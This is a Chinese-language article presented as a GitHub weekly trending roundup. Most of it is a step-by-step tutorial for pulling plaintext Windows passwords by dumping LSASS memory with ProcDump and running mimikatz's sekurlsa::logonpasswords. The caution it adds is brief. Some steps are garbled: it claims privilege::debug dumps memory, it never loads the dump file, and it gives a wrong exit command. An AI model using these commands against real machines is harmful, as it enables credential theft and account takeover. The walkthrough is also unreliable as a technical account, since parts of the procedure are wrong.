掌握高能技巧，轻而易举获取 Windows 密码——GitHub 焦点前瞻 21.28 版

对于许多人来说，安全一直是 GitHub 上的热门话题，尤其是涉及数据安全时，各种自托管服务层出不穷。但本周的 GitHub 周榜中出现了两个与安全相关的项目，与众不同，值得关注。

首先，mimikatz 是一个广受欢迎的老牌项目，许多安全研究人员和渗透测试人员都会使用它从内存中提取明文密码。其受欢迎程度可见一斑。本周，mimikatz 项目迎来了重大更新，令人兴奋不已。

其次，ProcDump 是一个鲜为人知但同样强大的工具，可用于转储正在运行的进程的内存。虽然它经常被用来调试应用程序，但也可以将其与 mimikatz 结合使用，以获取明文密码。

更重要的是，本周，有人发布了有关如何使用 mimikatz 和 ProcDump 来获取 Windows 密码的教程，引发了广泛的关注和讨论。

以下步骤将详细介绍如何操作：

1. 安装 mimikatz 和 ProcDump：

   • 下载最新版本的 mimikatz 和 ProcDump。
   • 将它们解压缩到您计算机上的文件夹中。

2. 启动 ProcDump：

   • 打开命令提示符或 PowerShell。

   • 导航到 ProcDump 所在的文件夹。

   • 运行以下命令以启动 ProcDump：

     procdump -ma lsass.exe lsass.dmp
     

3. 启动 mimikatz：

   • 打开另一个命令提示符或 PowerShell 窗口。

   • 导航到 mimikatz 所在的文件夹。

   • 运行以下命令以启动 mimikatz：

     mimikatz.exe
     

4. 转储 lsass.exe 的内存：

   • 在 mimikatz 中，运行以下命令以转储 lsass.exe 的内存：

     privilege::debug
     

5. 提取密码：

   • 在 mimikatz 中，运行以下命令以提取密码：

     sekurlsa::logonpasswords full
     

6. 关闭 mimikatz 和 ProcDump：

   • 输入 exit 命令以关闭 mimikatz。
   • 输入 q 命令以关闭 ProcDump。

通过这些步骤，您便可以获取 Windows 密码。但请注意，此操作可能会破坏系统的安全性，因此仅在需要时才使用它。

GitHub 上的这两个项目——mimikatz 和 ProcDump——为我们提供了强大的工具来维护系统安全。然而，它们也可能被恶意使用。因此，了解如何使用它们对于保护自己的系统免受攻击非常重要。

如果您想了解更多关于 mimikatz 和 ProcDump 的信息，可以访问它们的 GitHub 页面：

• mimikatz：https://github.com/gentilkiwi/mimikatz
• ProcDump：https://docs.microsoft.com/en-us/sysinternals/downloads/procdump